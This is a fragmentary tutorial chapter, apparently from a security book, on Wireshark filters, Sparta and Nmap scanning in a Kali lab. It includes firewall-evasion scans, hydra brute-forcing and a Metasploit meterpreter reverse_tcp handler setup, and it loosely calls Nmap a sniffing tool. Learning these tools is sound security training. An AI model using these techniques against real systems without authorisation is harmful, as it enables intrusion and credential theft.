Network sniffing is a collection of packet data that is transmitted throughout the network. Network sniffing is also known as packet analysis. There are different types of network sniffers. Two of the most common are Ethernet sniffers and wireless sniffers. A network sniffer is a piece of software or hardware that can capture and log network traffic.

Nmap is a popular network sniffing tool used by many cyber security professionals. Before using this tool, you must learn how to install it. You also need to be able to check the version and locate the user manual. It is recommended that you use Kali Linux as the operating system when using Nmap. Kali Linux comes with many pre-installed tools such as Nmap and Wireshark. If you are using a version of Linux without pre-installed tools, you must perform a fresh install. The best and most efficient way to install Nmap is to clone the repository...

This Nmap command will scan a target list for systems with open UDP services that allow reflection attacks to take place:

If you're not familiar with Wireshark, then you'll soon find out how powerful and effective this tool can be. Wireshark is a packet analyzer software that's open source and free to use. It can be used to troubleshoot networking issues and hunt down malicious activities. Basically, every bit (literally) of information that flows in and out of a network can be captured and dumped into a single location. Then we can take our time analyzing this information, using filters to narrow down our search. As of writing this book, the current version of Wireshark is 2.2.2, but always make sure that yours is up-to-date:

1. When you launch Wireshark, you should see the following screen. You will need to select the interface you want to scan on, depending on whether you use an Ethernet or a wireless connection. I am connected via Wi-Fi, so that is what I choose. Yours may be named differently...

This will only show packets containing the selected IP address. This can be either the source or the destination IP:

ip.addr ==x.x.x.x

This will show the communication between two IP addresses, which can be from the direction of the source or the destination:

ip.addr ==x.x.x.x && ip.addr ==x.x.x.x

You could also just type in the name of the protocol that you want to see:

http or dns

This filter will only show the TCP packets that are passing through the specified port number:

tcp.port==xxx

You may further specify the details of this filtering option to narrow your search of the TCP packets:

tcp.flags.reset==1

To identify certain types of web traffic, such as requests that are being made to certain websites on the network, enter the following:

http.request

Put an exclamation in front followed by the initial parentheses:

!(arp or icmp or dns)

tcp contains searches for exact...

Another tool used for network scanning is Sparta. The following lab demonstrates how this tool works. For this lab, we are using Kali Linux running in VMware.

Sparta is built into Kali 2.0, but if you don't have it, you can get it from the Kali repository by typing kali > apt-get install Sparta:

1. To get started, open a terminal window and type sparta. The following screenshot demonstrates the first screen you will see:

2. When you click on it, a GUI resembling the following will open:

3. Once Sparta has started, we need to add some hosts. If we click on the space that says Click here to add host(s) to scope, it opens a window where we can add IP addresses or the range of IP addresses we want to scan. We are also able to use CIDR notation to indicate an entire subnet, such as 192.168.181.0/24:

4. After adding our IP host range in the window, click Add to scope. Sparta will start scanning your hosts...

One of the best features of Sparta is that it integrates so many tools into one single GUI. When we click on the Tools tab, Sparta displays the numerous tools that we can apply to this target system, including the following:

• Mysql-default
• nikto
• Snmp-enum
• Smtp-enum-vrfy
• Snmp-default
• Snmp-check

Sparta can also brute-force passwords. Using hydra, you can specify the IP, port, and service, then brute-force it:

For those who want a single scanning and enumeration tool with an easy-to-use GUI, Sparta is the perfect reconnaissance tool.

The following demonstration will be a more detailed Nmap lab to reinforce what you have learned earlier in the chapter. This lab uses Kali Linux running in VMware:

1. Open Nmap in Kali.
2. Open a terminal in Kali and type nmap.

When you do so, Nmap will display its help screen, as shown in the following screenshot:

3. Let's try to use the -sS and -sT scans.

Using Nmap's basic syntax, type in the following:

          nmap <scantype> IP address

We get results like those shown in the following screenshot, showing all of the TCP ports that are open on our target machine and the default service for each port:

4. Next, we can scan for a specific port or port range.

Nmap uses the -p switch to designate a port or port range. So, if we were only looking for ports 100-200, we could use the following:

          kali > nmap 192.168.10.70 -p100-200

As you can see, this command scans and reveals...

Often, we want to scan more than a single IP address. Nmap allows us to use CIDR notation to designate an entire subnet. So, for instance, to scan on the entire class C subnet (256 hosts), type nmap 192.168.10.0/24:

When we are scanning machines that are not ours, we often want to hide our IP (our identity). Obviously, every packet must contain our source address or else the response from the target system will not know where to return to. The same applies to spoofing our IP when using Nmap. We can spoof our IP address (-S) in Nmap, but as a result, any response and any info we are trying to gather will return to the spoofed IP. Not very useful if we are scanning in order to gather info. A better solution is to obfuscate...

Many firewalls and routers block or drop the ICMP (echo request and echo reply) ping. This is meant to obscure the presence of the hosts behind the firewall and protect against a possible DoS using the ping packet. When you use Nmap to scan a system or network, by default, it sends out a ping to see if the host is up. If it gets a response, it then sends the specified packets to scan the system. If the ping is blocked or dropped, Nmap gives up and says, host is down. To get around firewalls and routers that block or drop the ping, we need to suppress Nmap's default behavior of sending out that initial ping and get past the firewall that is blocking us. We can do this by using the -P0 switch. Type nmap -sS -P0 192.168.10.70:

When Nmap runs a port scan, it retrieves the port info (open/closed/filtered) and then gives us the default service that is running on that port. As one can run any service on any port, that may not be adequate information. If our attack requires a particular service on a particular port, gathering the default information may not be enough. We need to know what service is actually running on that port, not the default service. For instance, knowing that port 80 is open and running HTTP is good to know, but if our attack is specific to Apache, and the target has Microsoft's IIS running on that port, it won't work. We often need the service on the port.

Nmap has a feature that interrogates the service running on each port scanned. It can be used with the -sV switch. Type nmap -sV 192.168.10.70:

Note that, in the output we received, the server is running an older version of IIS on...

First, we need to start our listener:

1. Open Metasploit by typing msfconsole.
2. Type use exploit/multi/handler.
3. As stated before, we will be using meterpreter reverse_tcp payload. To set the payload, type the following:

      set payload windows /meterpreter/reverse_tcp

This module doesn't have any settings that we can touch by default, so we need to add a payload. This tells the module what sort of reverse shell we're listening for; it'll help manage it for us:

• use exploit/multi/handler: handles the incoming connection
• set payload windows/meterpreter/reverse_tcp: reverses the TCP payload
• show options: shows the available options to set

4. We also need to set up the LHOST and LPORT and make sure they're the same as the ones you set up in Step 3.

Then type Set lhost 192.168.10.50 Set lport 8080:

          Set lhost 192.168.10.50
          Set lport 8080

5. Our handler is...

In this chapter, we went over how to use Nmap and Wireshark to monitor network traffic. You are now able to use both these tools, since you have an understanding of the commands and filter syntax. By using what you have learned in this chapter, you can now monitor a network for signs of attack. With this knowledge, you can be effective in stopping network attacks before they can do serious damage. You also learned about two valuable tools that can also diagnose non-malicious network anomalies. It is recommended that you master the use of Wireshark and study for a certification in its use. Many employers in the network security field are impressed with extensive knowledge of tools such as Wireshark.

In later chapters, we will discuss other network security tools that can be used in combination with Wireshark.